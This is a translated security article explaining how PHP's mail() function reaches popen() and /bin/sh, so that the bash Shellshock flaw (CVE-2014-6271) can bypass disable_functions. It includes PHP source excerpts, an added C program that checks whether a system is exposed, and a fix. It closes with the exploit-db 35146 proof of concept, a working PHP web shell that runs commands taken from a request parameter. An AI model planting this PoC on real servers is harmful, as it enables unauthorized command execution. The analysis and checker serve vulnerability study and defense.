
PHP Execute Command Bypass Disable_functions

First, a brief walk through what happens when PHP calls the mail() function.

Look at the source, ext/standard/mail.c, around line 236:

    char *sendmail_path = INI_STR("sendmail_path");
    char *sendmail_cmd = NULL;

sendmail_path is read from php.ini. This is how php.ini documents it:

    ; For Unix only.  You may supply arguments as well (default: "sendmail -t -i").
    ;sendmail_path =

As the comment says, the default value of sendmail_path is sendmail -t -i.

When extra_cmd (the additional parameters passed in by the caller, i.e. the fifth argument of mail()) is present, spprintf joins sendmail_path and extra_cmd into the command line that is actually executed, sendmail_cmd; otherwise sendmail_path is assigned to sendmail_cmd unchanged:

    if (!sendmail_path) {
    #if (defined PHP_WIN32 || defined NETWARE)
        /* handle old style win smtp sending */
        if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
            if (tsm_errmsg) {
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
                efree(tsm_errmsg);
            } else {
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
            }
            MAIL_RET(0);
        }
        MAIL_RET(1);
    #else
        MAIL_RET(0);
    #endif
    }
    if (extra_cmd != NULL) {
        spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
    } else {
        sendmail_cmd = sendmail_path;
    }

It then runs:

    #ifdef PHP_WIN32
        sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
    #else
        /* Since popen() doesn't indicate if the internal fork() doesn't work
         * (e.g. the shell can't be executed) we explicitly set it to 0 to be
         * sure we don't catch any older errno value. */
        errno = 0;
        sendmail = popen(sendmail_cmd, "w");
    #endif

That is, sendmail_cmd is handed to popen() for execution.

popen() runs its command through /bin/sh. If the system's default sh is bash, popen() therefore spawns a bash process, and the bash Shellshock vulnerability (CVE-2014-6271) lets us execute arbitrary commands through mail() and so bypass disable_functions: the script plants a function definition in the environment with putenv(), and a vulnerable bash evaluates the code that follows the definition while importing the environment, before sendmail is ever started. Note that mail() itself is not in disable_functions, and popen() is called from inside PHP rather than from the script, so the disable_functions check never sees it.

Likewise, a search of the PHP source shows that imap_mail is another PHP function that openly calls popen() to spawn a process. If you only disable mail() to work around this problem, imap_mail can be used as a substitute. There may well be other places in PHP that call popen() or otherwise spawn a bash child process; any of them can be used to execute commands through Shellshock.
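The stand-alone C program below is an added example; it is not code from the original article and not PHP's own source. It mirrors the ext/standard/mail.c path described above: it composes sendmail_cmd from sendmail_path and extra_cmd the way spprintf("%s %s") does, puts a bash-function definition into the environment the way a script's putenv() would (the variable name PHP_LOL follows the PoC), and hands the command to popen(). It then reports which binary /bin/sh resolves to, whether the installed bash still imports function bodies from the environment, and whether the mail() command line ran the exported function. "true -t -i" stands in for "sendmail -t -i" so the program runs without an MTA; all function names here are my own.

```c
/* Added example: reproduce the mail() -> popen() -> /bin/sh path outside PHP
 * and check the CVE-2014-6271 condition it depends on. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same composition as spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd):
 * extra_cmd (mail()'s fifth argument) is appended verbatim after one space.
 * Returns a malloc'd string that the caller frees. */
char *build_sendmail_cmd(const char *sendmail_path, const char *extra_cmd)
{
    size_t n = strlen(sendmail_path) + 1 + (extra_cmd ? strlen(extra_cmd) : 0) + 1;
    char *cmd = malloc(n);
    if (!cmd)
        return NULL;
    if (extra_cmd)
        snprintf(cmd, n, "%s %s", sendmail_path, extra_cmd);
    else
        snprintf(cmd, n, "%s", sendmail_path);
    return cmd;
}

/* Run cmd exactly as mail() does, popen(cmd, ...) i.e. /bin/sh -c cmd, and
 * capture its stdout. Returns the pclose() status, or -1 if popen() failed. */
static int run_via_popen(const char *cmd, char *out, size_t outlen)
{
    FILE *fp = popen(cmd, "r");
    if (!fp)
        return -1;
    size_t got = fread(out, 1, outlen - 1, fp);
    out[got] = '\0';
    return pclose(fp);
}

/* Resolve the binary behind /bin/sh, the shell glibc's popen() execs
 * (e.g. "/usr/bin/dash" or "/usr/bin/bash"). */
int popen_shell_path(char *out, size_t outlen)
{
    out[0] = '\0';
    int rc = run_via_popen("readlink -f /bin/sh", out, outlen);
    out[strcspn(out, "\n")] = '\0';
    return rc;
}

/* Export PHP_LOL as a function definition (the PHP_ prefix is what a
 * safe-mode php.ini lets scripts set, as the PoC's comment notes), run cmd
 * through popen(), and report 1 if the function body executed, 0 if not,
 * -1 on error. The command itself is irrelevant: a vulnerable bash runs the
 * body while importing the environment, before the command is parsed. */
int env_function_executed(const char *cmd)
{
    char out[512];
    if (setenv("PHP_LOL", "() { :; }; echo SHELLSHOCK_RAN", 1) != 0)
        return -1;
    int rc = run_via_popen(cmd, out, sizeof out);
    unsetenv("PHP_LOL");
    if (rc < 0)
        return -1;
    return strstr(out, "SHELLSHOCK_RAN") != NULL;
}

/* The situation mail("a@127.0.0.1","","","","-bv") creates: the default
 * "sendmail -t -i" plus the caller's "-bv", executed through /bin/sh.
 * "true" replaces sendmail so this needs no MTA (an assumption of the example). */
int mail_path_exploitable(void)
{
    char *cmd = build_sendmail_cmd("true -t -i", "-bv");
    if (!cmd)
        return -1;
    int r = env_function_executed(cmd);
    free(cmd);
    return r;
}

/* Is the installed bash itself unpatched, even when /bin/sh is not bash?
 * The variable passes through sh untouched and is imported by bash. */
int bash_itself_vulnerable(void)
{
    return env_function_executed("bash -c true 2>/dev/null");
}

int main(void)
{
    char shell[512];
    if (popen_shell_path(shell, sizeof shell) >= 0)
        printf("popen() spawns /bin/sh ->      %s\n", shell);
    int b = bash_itself_vulnerable();
    printf("bash imports env functions:    %s\n", b == 1 ? "YES" : b == 0 ? "no" : "error/absent");
    int m = mail_path_exploitable();
    printf("mail() path runs env function: %s\n",
           m == 1 ? "YES (CVE-2014-6271 reachable through mail())" : m == 0 ? "no" : "error");
    return 0;
}
```

Both conditions have to hold for the bypass to work: /bin/sh must be bash (or sendmail_path must itself end up invoking bash) and that bash must still import function definitions. On a system where sh is dash and bash is patched the last two lines print "no", which is the state the fix below aims for.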
Affected versions: PHP 5.x (tested); other versions not tested.

Fix: patch bash for CVE-2014-6271. The bug lives in bash rather than in PHP, so removing mail() from the attack surface alone is not a fix (imap_mail and any other popen() caller remain); the vector closes once the shell that popen() spawns no longer imports function definitions from the environment.

The PoC (http://www.exploit-db.com/exploits/35146/):
    <?php
    // PoC from exploit-db 35146: run $cmd through CVE-2014-6271 by way of
    // mail() -> popen() -> /bin/sh (bash), without calling any function
    // that disable_functions is likely to list.
    function shellshock($cmd) {
        // temp file in the current directory that collects the command's output
        $tmp = tempnam(".", "data");
        // PHP_LOL becomes a function definition in the environment that popen()
        // inherits; a vulnerable bash executes what follows the definition,
        // i.e. $cmd, while importing the variable.
        putenv("PHP_LOL=() { :; }; $cmd >$tmp 2>&1");
        // In Safe Mode, the user may only alter environment variables whose names
        // begin with the prefixes supplied by this directive.
        // By default, users will only be able to set environment variables that
        // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
        // PHP will let the user modify ANY environment variable!
        // -bv so we don't actually send any mail (it is appended to sendmail_path)
        mail("a@127.0.0.1", "", "", "", "-bv");
        $output = @file_get_contents($tmp);
        @unlink($tmp);
        if ($output != "") return $output;
        else return "No output, or not vuln.";
    }
    echo shellshock($_REQUEST["cmd"]);
    ?>
This article is from http://www.leavesongs.com/; original: http://www.leavesongs.com/php/php-bypass-disable-functions-by-cve-2014-6271.html. Thanks to the original author for sharing.